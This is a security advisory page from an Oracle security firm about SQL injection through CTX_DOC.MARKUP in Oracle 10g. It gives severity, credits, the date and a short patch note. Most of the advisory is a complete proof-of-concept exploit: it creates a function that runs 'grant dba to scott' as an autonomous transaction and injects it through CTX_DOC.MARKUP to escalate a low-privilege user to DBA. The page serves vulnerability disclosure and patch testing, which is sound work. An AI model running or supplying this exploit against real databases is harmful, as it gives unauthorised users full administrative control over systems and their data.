Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
SQL Injection via Oracle CTX_DOC.Markup in Oracle 10g in Oracle 10g


Name SQL Injection via Oracle CTX_DOC.Markup in Oracle 10g in Oracle 10g
Systems Affected Oracle 10g
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Credit Exploit
Alexandr "Sh2kerr" Polyakov 
Exploit milw0rm
Date 23 Oct 2007 (V 1.00)

Details

The following proof of concept exploit code injects a function into ctx_doc and grants the DBA permission to the user SCOTT. This exploit is working on Oracle 10g.


Example
CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'grant dba to scott';
COMMIT;
RETURN '';
END;
/


set serveroutput on

create table mark_tab (id number primary key, text varchar2(80) );

insert into mark_tab values ('1', 'All your bases are belong to US');

create index mark_tab_idx on mark_tab(text)
        indextype is ctxsys.context parameters
        ('filter ctxsys.null_filter');


SET SERVEROUTPUT ON;
DECLARE
     mklob CLOB;
     amt NUMBER := 40;
     line VARCHAR2(80);
     BEGIN
       CTX_DOC.MARKUP('mark_tab_idx','1',''||scott.HACKIT()||'', mklob);
       DBMS_LOB.READ(mklob, amt, 1, line);
       DBMS_OUTPUT.PUT_LINE('QWRvcmUuVS5NeS5TdGFy'||line);
       DBMS_LOB.FREETEMPORARY(mklob);
       END;
     /


Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update October 2007.




2007 by Red-Database-Security GmbH - last update 28-nov-2007

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.